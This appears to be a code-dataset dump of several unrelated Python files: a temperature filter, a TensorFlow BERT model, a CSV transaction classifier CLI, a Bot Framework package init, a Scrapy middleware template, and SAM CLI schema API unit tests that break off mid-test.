hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
aae2ca36a949bc8987839b2e06ad9a66b03318da | 318 | py | Python | ___Python/KarPoo/po1_kennenlernen/p03_lambda/m01_filtern.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | [
"Apache-2.0"
] | null | null | null | ___Python/KarPoo/po1_kennenlernen/p03_lambda/m01_filtern.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | [
"Apache-2.0"
] | null | null | null | ___Python/KarPoo/po1_kennenlernen/p03_lambda/m01_filtern.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | [
"Apache-2.0"
] | null | null | null | celsius_temperaturen = [0.7, 2.1, 4.2, 8.2, 12.5, 15.6, 16.9, 16.3, 13.6, 9.5, 4.6, 2.3] #Durchschnittstemperaturen in Bilefeld nach Monat
# Alle Temperaturen >= 15:
gefiltert = []
for temperatur in celsius_temperaturen:
if temperatur >= 15:
gefiltert.append(temperatur)
print(gefiltert)
print() | 31.8 | 139 | 0.669811 |
2173d7a0d159688bd01411cec21550906d3676e9 | 20,614 | py | Python | Bert/modeling.py | SmileTM/paper_coding | 992c4ff95358649130958d10b9dbe0bb31b6d1cb | [
"Apache-2.0"
] | 3 | 2020-02-14T17:05:59.000Z | 2020-11-16T03:41:07.000Z | Bert/modeling.py | SmileTM/paper_coding | 992c4ff95358649130958d10b9dbe0bb31b6d1cb | [
"Apache-2.0"
] | null | null | null | Bert/modeling.py | SmileTM/paper_coding | 992c4ff95358649130958d10b9dbe0bb31b6d1cb | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# File: modeling.py
# Author: SmileTM
# Site: s-tm.cn
# Github: https://github.com/SmileTM
# Time: 02.09.2020
#
import tensorflow as tf
import utils
import copy
import json
import six
class BertConfig(object):
def __init__(self,
vocab_size=30522, # 字典大小
hidden_size=768, # 隐藏层维度
num_hidden_layers=12, # Transformer层数
num_attention_heads=12, # head个数
intermediate_size=3072, # FFN中Dense的维度
hidden_act='gelu', # 激活函数
hidden_dropout_prob=0.0, # attention外部的droprate
attention_probs_dropout_prob=0.0, # attnetion中droprate
max_position_embeddings=512, # 最大输入的长度
type_vocab_size=16, # vocab种类
initializer_range=0.02): # 初始化率
self.vocab_size = vocab_size
self.num_attention_heads = num_attention_heads
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.intermediate_size = intermediate_size
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.hidden_act = hidden_act
self.initializer_range = initializer_range
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.hidden_dropout_prob = hidden_dropout_prob
@classmethod
def from_dict(cls, json_object):
"""Constructs a `BertConfig` from a Python dictionary of parameters."""
config = BertConfig(vocab_size=None)
for (key, value) in six.iteritems(json_object):
config.__dict__[key] = value
return config
@classmethod
def from_json_file(cls, json_file):
"""Constructs a `BertConfig` from a json file of parameters."""
with tf.io.gfile.GFile(json_file, "r") as reader:
text = reader.read()
return cls.from_dict(json.loads(text))
def to_dict(self):
"""Serializes this instance to a Python dictionary."""
output = copy.deepcopy(self.__dict__)
return output
def to_json_string(self):
"""Serializes this instance to a JSON string."""
return json.dumps(self.to_dict(), indent=2, sort_keys=True) + "\n"
class BertModel(tf.keras.layers.Layer):
def __init__(self, bertconfig: BertConfig, **kwargs):
super(BertModel, self).__init__(**kwargs)
self.config = bertconfig
def build(self, input_shape):
self.embedding_processor = EmbeddingProcessor(vocab_szie=self.config.vocab_size,
hidden_size=self.config.hidden_size,
max_position_embeddings=self.config.max_position_embeddings,
type_vocab_size=self.config.type_vocab_size,
hidden_dropout_prob=self.config.hidden_dropout_prob,
initializer_range=self.config.initializer_range)
self.encoder = Transformer(num_hidden_layers=self.config.num_hidden_layers,
hidden_size=self.config.hidden_size,
num_attention_heads=self.config.num_attention_heads,
intermediate_size=self.config.intermediate_size,
hidden_act=self.config.hidden_act,
attention_probs_dropout_prob=self.config.attention_probs_dropout_prob,
hidden_dropout_prob=self.config.hidden_dropout_prob,
initializer_range=self.config.initializer_range,
name='encoder'
)
self.pooler_transform = tf.keras.layers.Dense(
units=self.config.hidden_size,
activation="tanh",
kernel_initializer=get_initializer(self.config.initializer_range),
name="pooler_transform")
super(BertModel, self).build(input_shape)
def call(self, inputs, mode="bert"):
(input_ids, input_mask, segment_ids) = inputs
input_tensor = self.embedding_processor((input_ids, segment_ids))
attention_mask = create_attention_mask_from_input_mask(input_mask)
if mode == 'encoder':
return self.encoder((input_tensor, attention_mask), return_all_layers=True)
sequence_output = self.encoder((input_tensor, attention_mask))
first_token_tensor = tf.squeeze(sequence_output[:, 0:1, :], axis=1) # [batch_size ,hidden_size]
pooled_output = self.pooler_transform(first_token_tensor)
return (pooled_output, sequence_output)
def get_embedding_table(self):
return self.embedding_processor.embedding_word_ids.embeddings
def get_config(self):
config = super(BertModel, self).get_config()
config.update({"config": self.config.to_dict()})
return config
class EmbeddingProcessor(tf.keras.layers.Layer):
def __init__(self,
vocab_szie,
hidden_size=768,
max_position_embeddings=512,
type_vocab_size=16,
hidden_dropout_prob=0.0,
initializer_range=0.02,
**kwargs):
super(EmbeddingProcessor, self).__init__(**kwargs)
self.vocab_size = vocab_szie
self.hidden_size = hidden_size
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.hidden_dropout_prob = hidden_dropout_prob
self.initializer_range = initializer_range
def build(self, input_shape):
self.embedding_word_ids = tf.keras.layers.Embedding(input_dim=self.vocab_size,
output_dim=self.hidden_size,
embeddings_initializer=get_initializer(
self.initializer_range),
name="embedding_word_ids",
dtype=tf.float32
)
self.embedding_type_ids = tf.keras.layers.Embedding(input_dim=self.type_vocab_size,
output_dim=self.hidden_size,
embeddings_initializer=get_initializer(
self.initializer_range),
name="embedding_type_ids",
dtype=tf.float32)
self.embedding_pos = self.add_weight(name='embedding_pos/embeddings',
shape=(self.max_position_embeddings, self.hidden_size),
initializer=get_initializer(self.initializer_range),
dtype=tf.float32)
self.output_layer_norm = tf.keras.layers.LayerNormalization(
name="layer_norm", axis=-1, epsilon=1e-12, dtype=tf.float32)
self.output_dropout = tf.keras.layers.Dropout(
rate=self.hidden_dropout_prob, dtype=tf.float32)
super(EmbeddingProcessor, self).build(input_shape)
def call(self, inputs):
input_ids, segment_ids = inputs
seq_length = input_ids.shape[1]
token_word_embeddings = self.embedding_word_ids(input_ids) # [batch_size, seq_length, hidden_size]
token_type_embeddings = self.embedding_type_ids(segment_ids) # [batch_size, seq_length, hidden_size]
token_pos_embeddings = tf.expand_dims(self.embedding_pos[:seq_length, :],
axis=0) # [1, seq_length, hidden_size]
output = token_word_embeddings + token_type_embeddings + token_pos_embeddings
output = self.output_layer_norm(output)
output = self.output_dropout(output)
return output
def get_config(self):
config = super(EmbeddingProcessor, self).get_config()
config.update({"vocab_szie": self.vocab_size,
"hidden_size": self.hidden_size,
"max_position_embeddings": self.max_position_embeddings,
"type_vocab_size": self.type_vocab_size,
"hidden_dropout_prob": self.hidden_dropout_prob,
"initializer_range": self.initializer_range})
return config
class Atttention(tf.keras.layers.Layer):
def __init__(self,
hidden_size=768,
num_attention_heads=12,
dropout_rate=0.0,
initializer_range=0.02,
**kwargs):
super(Atttention, self).__init__(**kwargs)
self.hidden_size = hidden_size
self.num_attention_heads = num_attention_heads
self.dropout_rate = dropout_rate
self.initializer_range = initializer_range
self.d_head = hidden_size // num_attention_heads
def build(self, input_shape):
self.qw = tf.keras.layers.Dense(self.hidden_size,
kernel_initializer=get_initializer(self.initializer_range),
name='query')
self.kw = tf.keras.layers.Dense(self.hidden_size,
kernel_initializer=get_initializer(self.initializer_range),
name='key')
self.vw = tf.keras.layers.Dense(self.hidden_size,
kernel_initializer=get_initializer(self.initializer_range),
name='value')
self.drop = tf.keras.layers.Dropout(rate=self.dropout_rate)
self.outdense = tf.keras.layers.Dense(self.hidden_size,
kernel_initializer=get_initializer(self.initializer_range),
name='self_attention_output')
super(Atttention, self).build(input_shape)
def call(self, inputs):
q, k, v, atteintion_mask = inputs
q = self.qw(q)
k = self.kw(k)
v = self.vw(v)
(q, k, v) = self.split_head(q=q, k=k, v=v)
out = self.attention_procedure(q, k, v, atteintion_mask)
out = tf.einsum('BNFD->BFND', out)
out = tf.reshape(tensor=out, shape=[-1, out.shape[1], out.shape[2] * out.shape[3]])
out = self.outdense(out)
return out
def split_head(self, q, k, v):
batch_size = tf.shape(q)[0]
q = tf.reshape(q, (batch_size, -1, self.num_attention_heads, self.d_head))
k = tf.reshape(k, (batch_size, -1, self.num_attention_heads, self.d_head))
v = tf.reshape(v, (batch_size, -1, self.num_attention_heads, self.d_head))
q = tf.einsum('BFND->BNFD', q)
k = tf.einsum('BFND->BNFD', k)
v = tf.einsum('BFND->BNFD', v)
return (q, k, v)
def attention_procedure(self, q, k, v, attention_mask):
qk = tf.einsum('BNFD,BNfD->BNFf', q, k)
dk = tf.cast(k.shape[-1], qk.dtype)
attention_weights = qk / tf.sqrt(dk)
if attention_mask is not None:
attention_mask = attention_mask[:, None, :, :]
attention_weights += tf.cast(1.0 - attention_mask, attention_weights.dtype) * -1e9
attention_probs = tf.nn.softmax(attention_weights)
attention_probs = self.drop(attention_probs)
out = tf.einsum('BNFf,BNfD->BNFD', attention_probs, v)
return out
def get_config(self):
config = super(Atttention, self).get_config()
config.update({"hidden_size": self.hidden_size,
"num_attention_heads": self.num_attention_heads,
"dropout_rate": self.num_attention_heads,
"initializer_range": self.initializer_range})
return config
class TransformerBlock(tf.keras.layers.Layer):
def __init__(self,
num_attention_heads=12,
hidden_size=768,
intermediate_size=3072,
hidden_act='gelu',
initializer_range=0.02,
hidden_dropout_prob=0.0,
attention_probs_dropout_prob=0.0,
**kwargs):
super(TransformerBlock, self).__init__(**kwargs)
self.num_attention_heads = num_attention_heads
self.hidden_size = hidden_size
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.initializer_range = initializer_range
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
def build(self, input_shape):
self.attention = Atttention(hidden_size=self.hidden_size,
num_attention_heads=self.num_attention_heads,
dropout_rate=self.attention_probs_dropout_prob,
name="self_attention")
self.attention_layer_norm = tf.keras.layers.LayerNormalization(name="self_attention_layer_norm",
axis=-1,
epsilon=1e-12,
dtype=tf.float32)
self.attention_dropout = tf.keras.layers.Dropout(rate=self.hidden_dropout_prob)
self.output_dropout = tf.keras.layers.Dropout(rate=self.hidden_dropout_prob)
self.output_dense1 = tf.keras.layers.Dense(self.intermediate_size,
activation=utils.get_activation(self.hidden_act),
name='intermediate'
)
self.output_dense2 = tf.keras.layers.Dense(self.hidden_size,
activation=None,
name='output'
)
self.output_layer_norm = tf.keras.layers.LayerNormalization(name="output_layer_norm",
axis=-1,
epsilon=1e-12,
dtype=tf.float32)
super(TransformerBlock, self).build(input_shape)
def call(self, inputs):
(input_tensor, attention_mask) = inputs
attention_output = self.attention((input_tensor, input_tensor, input_tensor, attention_mask))
attention_output = self.attention_dropout(attention_output)
attention_output = self.attention_layer_norm(input_tensor + attention_output)
layer_output = self.output_dense1(attention_output)
layer_output = self.output_dense2(layer_output)
layer_output = self.output_dropout(layer_output)
layer_output = self.output_layer_norm(layer_output + attention_output)
return layer_output
def get_config(self):
config = super(TransformerBlock, self).get_config()
config.update({"num_attention_heads": self.num_attention_heads,
"hidden_size": self.hidden_size,
"intermediate_size": self.initializer_range,
"hidden_act": self.hidden_act,
"initializer_range": self.initializer_range,
"hidden_dropout_prob": self.hidden_dropout_prob,
"attention_probs_dropout_prob": self.attention_probs_dropout_prob
})
return config
class Transformer(tf.keras.layers.Layer):
def __init__(self,
num_attention_heads=12,
hidden_size=768,
num_hidden_layers=12,
intermediate_size=3072,
hidden_act='gelu',
initializer_range=0.02,
attention_probs_dropout_prob=0.0,
hidden_dropout_prob=0.0,
**kwargs):
super(Transformer, self).__init__(**kwargs)
self.num_attention_heads = num_attention_heads
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.initializer_range = initializer_range
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
def build(self, input_shape):
self.layers = []
for i in range(self.num_hidden_layers):
self.layers.append(TransformerBlock(num_attention_heads=self.num_attention_heads,
hidden_size=self.hidden_size,
intermediate_size=self.intermediate_size,
hidden_act=self.hidden_act,
initializer_range=self.initializer_range,
hidden_dropout_prob=self.hidden_dropout_prob,
attention_probs_dropout_prob=self.attention_probs_dropout_prob,
name=("layer_%d" % i)))
super(Transformer, self).build(input_shape)
def call(self, inputs, return_all_layers=False):
input_tensor, attention_mask = inputs
output_tensor = input_tensor
all_layer_outputs = []
for layer in self.layers:
output_tensor = layer((output_tensor, attention_mask))
all_layer_outputs.append(output_tensor)
if return_all_layers:
return all_layer_outputs
return all_layer_outputs[-1]
def get_config(self):
config = super(Transformer, self).get_config()
config.update({"num_attention_heads": self.num_attention_heads,
"hidden_size": self.hidden_size,
"num_hidden_layers": self.num_hidden_layers,
"intermediate_size": self.intermediate_size,
"hidden_act": self.hidden_act,
"initializer_range": self.initializer_range,
"attention_probs_dropout_prob": self.attention_probs_dropout_prob,
"hidden_dropout_prob": self.hidden_dropout_prob,
})
return config
def get_initializer(initializer_range=0.02):
"""Creates a `tf.initializers.truncated_normal` with the given range.
Args:
initializer_range: float, initializer range for stddev.
Returns:
TruncatedNormal initializer with stddev = `initializer_range`.
"""
return tf.keras.initializers.TruncatedNormal(stddev=initializer_range)
def create_attention_mask_from_input_mask(mask):
'''
:param mask: shepe = [batch_size, seq_length]
:return: attentino_mask = shape = [batch_size, seq_length, seq_length]
'''
attention_mask = tf.einsum('BF,BT->BFT', mask, mask)
return tf.cast(attention_mask, tf.float32)
if __name__ == '__main__':
input_ids = tf.keras.layers.Input(shape=(512,))
input_mask = tf.keras.layers.Input(shape=(512,))
segment_ids = tf.keras.layers.Input(shape=(512,))
config = BertConfig(max_position_embeddings=512, vocab_size=21128, type_vocab_size=2)
bertModel = BertModel(config)
output = bertModel((input_ids, input_mask, segment_ids))
model = tf.keras.Model(inputs=(segment_ids, input_mask, input_ids), outputs=output)
#
# print(model.trainable_weights)
model.summary()
model.load_weights('/Users/lollipop/Documents/paper_coding/Bert/out_new/bert_model.ckpt')
# print(model.trainable_weights)
# model.trainable_weights[-1].numpy = tf.random.uniform(shape=(768,), dtype=tf.float32)
# model.layers[-1].trainable_weights[-1].assign(tf.ones(shape=(768,), dtype=tf.float32))
# print(model.layers[-1].trainable_weights[-1])
print('@@@@@@@@')
print(model.trainable_weights)
for i in model.trainable_weights:
print(i.name)
| 45.606195 | 114 | 0.579703 |
96f04db0c6ebb8cd2fbf8cbb698fadabe1d378a5 | 2,429 | py | Python | abcli/commands/csv/classify.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | 3 | 2019-10-19T15:07:34.000Z | 2022-01-07T01:49:24.000Z | abcli/commands/csv/classify.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | null | null | null | abcli/commands/csv/classify.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | 1 | 2022-03-12T03:22:29.000Z | 2022-03-12T03:22:29.000Z | import csv
import logging
import re
from pathlib import Path
from pprint import PrettyPrinter
import click
import yaml
from abcli.utils import PathType
pformat = PrettyPrinter().pformat
logger = logging.getLogger()
def classify(txns: [dict], rulebook: dict) -> ([dict], int):
restxns = []
def _lookup_rulebook(note):
for keyword, rule in rulebook['keyword'].items():
if keyword.upper() in note.upper():
return rule
for regex, rule in rulebook['regex'].items():
if re.match(regex, note):
return rule
for idx, txn in enumerate(txns):
rule = _lookup_rulebook(txn['description'])
if rule is not None:
if isinstance(rule, str):
txn['that_auto'] = rule
if isinstance(rule, dict):
txn.update(rule)
restxns.append(txn)
return restxns
@click.command("classify")
@click.option("-r", "--rulebook", "rulebook_path", type=PathType(exists=True, dir_okay=False),
help='Rule book JSON file for assigning accounts/categories; default can be specified in config.json')
@click.argument("csvpath", type=PathType(exists=True, dir_okay=False))
def cmd_classify(csvpath: Path, rulebook_path: Path):
rulebook = _load_rulebook(rulebook_path)
with csvpath.open('r', encoding='utf-8') as fp:
reader = csv.DictReader(fp)
fieldnames = reader.fieldnames
rows = list(reader)
restxns = classify(rows, rulebook)
num_classified = len(list(filter(lambda txn: txn['that_auto'] or txn['that_overwrite'], restxns)))
click.echo(f"{num_classified}/{len(restxns)} classified ({int(num_classified / len(restxns) * 100)}%)")
with csvpath.open('w', encoding='utf-8') as fp:
writer = csv.DictWriter(fp, fieldnames)
writer.writeheader()
writer.writerows(restxns)
CONFIG_RULEBOOK_KEY = "csv.classify.rulebook"
def _load_rulebook(rb_path: Path):
if rb_path is None:
config = click.get_current_context().meta
if config.get(CONFIG_RULEBOOK_KEY, None):
rb_path = Path(config[CONFIG_RULEBOOK_KEY])
else:
raise click.UsageError(f"Rulebook path not specified on command line, nor defined in config JSON.",
click.get_current_context())
with rb_path.open('r', encoding='utf-8') as fp:
return yaml.full_load(fp)
| 31.141026 | 116 | 0.645121 |
80ac54c228d273e31c5a2a723b6d2a4643ed42f5 | 1,942 | py | Python | libraries/botbuilder-core/botbuilder/core/__init__.py | congysu/botbuilder-python | 274663dd91c811bae6ac4488915ba5880771b0a7 | [
"MIT"
] | null | null | null | libraries/botbuilder-core/botbuilder/core/__init__.py | congysu/botbuilder-python | 274663dd91c811bae6ac4488915ba5880771b0a7 | [
"MIT"
] | null | null | null | libraries/botbuilder-core/botbuilder/core/__init__.py | congysu/botbuilder-python | 274663dd91c811bae6ac4488915ba5880771b0a7 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from .about import __version__
from .activity_handler import ActivityHandler
from .assertions import BotAssert
from .bot_adapter import BotAdapter
from .bot_framework_adapter import BotFrameworkAdapter, BotFrameworkAdapterSettings
from .bot_state import BotState
from .bot_telemetry_client import BotTelemetryClient
from .card_factory import CardFactory
from .conversation_state import ConversationState
from .memory_storage import MemoryStorage
from .message_factory import MessageFactory
from .middleware_set import AnonymousReceiveMiddleware, Middleware, MiddlewareSet
from .null_telemetry_client import NullTelemetryClient
from .state_property_accessor import StatePropertyAccessor
from .state_property_info import StatePropertyInfo
from .storage import Storage, StoreItem, StorageKeyFactory, calculate_change_hash
from .turn_context import TurnContext
from .user_state import UserState
__all__ = ['ActivityHandler',
'AnonymousReceiveMiddleware',
'BotAdapter',
'BotAssert',
'BotFrameworkAdapter',
'BotFrameworkAdapterSettings',
'BotState',
'BotTelemetryClient',
'calculate_change_hash',
'CardFactory',
'ConversationState',
'MemoryStorage',
'MessageFactory',
'Middleware',
'MiddlewareSet',
'NullTelemetryClient',
'StatePropertyAccessor',
'StatePropertyInfo',
'Storage',
'StorageKeyFactory',
'StoreItem',
'TurnContext',
'UserState',
'__version__']
| 38.078431 | 83 | 0.659629 |
b00d21e7e3c96f5b3d581f223d3818e1259bd694 | 3,648 | py | Python | mycwpjt/mycwpjt/middlewares.py | aibittek/PythonSpider | 64b2d6f8fe016d79a990ee735754b811cf285df0 | [
"MIT"
] | null | null | null | mycwpjt/mycwpjt/middlewares.py | aibittek/PythonSpider | 64b2d6f8fe016d79a990ee735754b811cf285df0 | [
"MIT"
] | null | null | null | mycwpjt/mycwpjt/middlewares.py | aibittek/PythonSpider | 64b2d6f8fe016d79a990ee735754b811cf285df0 | [
"MIT"
] | null | null | null | # Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class MycwpjtSpiderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, or item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Request or item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class MycwpjtDownloaderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| 35.076923 | 78 | 0.674342 |
ab13e8e7fc69150cbc4bb5aa0e3772435d69d37a | 29,848 | py | Python | tests/unit/lib/schemas/test_schemas_api_caller.py | G4brym/aws-sam-cli | 0601140f031f5b325b1861b298a6a589cf9c072b | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2019-05-01T08:27:35.000Z | 2019-05-01T08:27:35.000Z | tests/unit/lib/schemas/test_schemas_api_caller.py | G4brym/aws-sam-cli | 0601140f031f5b325b1861b298a6a589cf9c072b | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2020-10-05T17:15:43.000Z | 2020-10-05T17:15:43.000Z | tests/unit/lib/schemas/test_schemas_api_caller.py | G4brym/aws-sam-cli | 0601140f031f5b325b1861b298a6a589cf9c072b | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2021-11-29T19:10:17.000Z | 2021-11-29T19:10:17.000Z | import io
import tempfile
from unittest.mock import Mock, call
from unittest import TestCase
import botocore
from botocore.exceptions import WaiterError
from samcli.lib.schemas.schemas_constants import DEFAULT_EVENT_SOURCE, DEFAULT_EVENT_DETAIL_TYPE
from samcli.commands.exceptions import SchemasApiException
from samcli.commands.local.cli_common.user_exceptions import ResourceNotFound, NotAvailableInRegion
from samcli.lib.schemas.schemas_api_caller import SchemasApiCaller
class TestSchemasCommand(TestCase):
def setUp(self):
self.client = Mock()
def test_list_registries_with_next_token(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = [
{
"ResponseMetadata": {
"RequestId": "26f73117-024e-49ce-8788-ea4d9278fdd8",
"HTTPStatusCode": 200,
"HTTPHeaders": {},
"RetryAttempts": 0,
},
"NextToken": "1111111111",
"Registries": [{"RegistryName": "aws.events"}],
}
]
list_registries_response = schemas_api_caller.list_registries("next_token", max_items)
self.assertEqual(list_registries_response["registries"], ["aws.events"])
self.assertEqual(list_registries_response["next_token"], "1111111111")
self.client.get_paginator.assert_called_once()
self.client.get_paginator.assert_called_once_with("list_registries")
self.client.get_paginator.return_value.paginate.assert_called_once_with(
PaginationConfig={"StartingToken": "next_token", "MaxItems": max_items, "PageSize": max_items}
)
def test_list_registries_without_next_token(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = [
{
"ResponseMetadata": {
"RequestId": "26f73117-024e-49ce-8788-ea4d9278fdd8",
"HTTPStatusCode": 200,
"HTTPHeaders": {},
"RetryAttempts": 0,
},
"Registries": [{"RegistryName": "aws.events"}],
}
]
list_registries_response = schemas_api_caller.list_registries(None, max_items)
self.assertEqual(list_registries_response["registries"], ["aws.events"])
self.assertEqual(list_registries_response["next_token"], None)
self.client.get_paginator.assert_called_once()
self.client.get_paginator.assert_called_once_with("list_registries")
self.client.get_paginator.return_value.paginate.assert_called_once_with(
PaginationConfig={"StartingToken": None, "MaxItems": max_items, "PageSize": max_items}
)
def test_list_registries_raises_not_available_in_region_exception(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = False
self.client.get_paginator.return_value.paginate.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.list_registries("next_token", max_items)
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_list_schemas_with_next_token(self):
registry_name = "registry1"
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = [
{
"ResponseMetadata": {
"RequestId": "123",
"HTTPHeaders": {
"x-amzn-requestid": "e28",
"x-amz-apigw-id": "CTqLRGCbPHcFiAg=",
"x-amzn-trace-id": "Root=1-350;Sampled=0",
},
"RetryAttempts": 0,
},
"NextToken": "1111111111",
"Schemas": [
{
"LastModified": "LastModified",
"SchemaName": "aws.autoscaling.AWSAPICallViaCloudTrail",
"VersionCount": 1,
}
],
}
]
list_schemas_response = schemas_api_caller.list_schemas(registry_name, "next_token", max_items)
self.assertEqual(len(list_schemas_response["schemas"]), 1)
self.assertEqual(list_schemas_response["schemas"], ["aws.autoscaling.AWSAPICallViaCloudTrail"])
self.assertEqual(list_schemas_response["next_token"], "1111111111")
self.client.get_paginator.assert_called_once()
self.client.get_paginator.assert_called_once_with("list_schemas")
self.client.get_paginator.return_value.paginate.assert_called_once_with(
RegistryName=registry_name,
PaginationConfig={"StartingToken": "next_token", "MaxItems": max_items, "PageSize": max_items},
)
def test_list_schemas_without_next_token(self):
registry_name = "registry1"
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = [
{
"ResponseMetadata": {
"RequestId": "123",
"HTTPHeaders": {
"x-amzn-requestid": "e28",
"x-amz-apigw-id": "CTqLRGCbPHcFiAg=",
"x-amzn-trace-id": "Root=1-350;Sampled=0",
},
"RetryAttempts": 0,
},
"Schemas": [
{
"LastModified": "LastModified",
"SchemaName": "aws.autoscaling.AWSAPICallViaCloudTrail",
"VersionCount": 1,
}
],
}
]
list_schemas_response = schemas_api_caller.list_schemas(registry_name, None, max_items)
self.assertEqual(len(list_schemas_response["schemas"]), 1)
self.assertEqual(list_schemas_response["schemas"], ["aws.autoscaling.AWSAPICallViaCloudTrail"])
self.assertEqual(list_schemas_response["next_token"], None)
self.client.get_paginator.assert_called_once()
self.client.get_paginator.assert_called_once_with("list_schemas")
self.client.get_paginator.return_value.paginate.assert_called_once_with(
RegistryName=registry_name,
PaginationConfig={"StartingToken": None, "MaxItems": max_items, "PageSize": max_items},
)
def test_list_schemas_raises_not_available_in_region_exception(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = False
self.client.get_paginator.return_value.paginate.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.list_schemas("registry-name", "next_token", max_items)
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_get_schema_metadata_1p(self):
self.client.describe_schema.return_value = {
"SchemaArn": "",
"Tags": {},
"LastModified": "2019-11-25T20:33:14Z",
